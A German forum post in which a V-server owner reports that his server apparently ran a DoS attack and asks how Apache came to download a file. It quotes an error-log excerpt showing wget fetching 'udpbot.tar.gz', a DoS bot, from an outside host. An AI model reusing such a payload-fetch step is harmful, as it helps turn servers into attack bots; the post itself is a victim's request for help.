Hi,
letzte Nacht hat mein V-Server bei strato einen DoS Angriff ausgeführt.
Über SSH kam er nicht rein aber scheinbar über den Apache, dazu folgender brisanter ausschnitt aus der error.log:
cat: /dev/saux: No such file or directory
--00:05:30-- http://sid.ca/1/udpbot.tar.gz
=> `udpbot.tar.gz'
Resolving sid.ca... 72.55.153.179
Connecting to sid.ca|72.55.153.179|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 191,467 (187K) [application/x-gzip]
0K .......... .......... .......... .......... .......... 26% 106.47 KB/s
50K .......... .......... .......... .......... .......... 53% 374.09 KB/s
100K .......... .......... .......... .......... .......... 80% 225.36 KB/s
150K .......... .......... .......... ...... 100% 300.18 KB/s
00:05:31 (197.16 KB/s) - `udpbot.tar.gz' saved [191467/191467]
meine Frage WARUM hat apache einfach so udpbot.tar.gz geladen und wie kann ich das in zukunft verhindern :S ( wo hat er das filde gespeichert mittlerweile ist es nicht mehr auf der platte )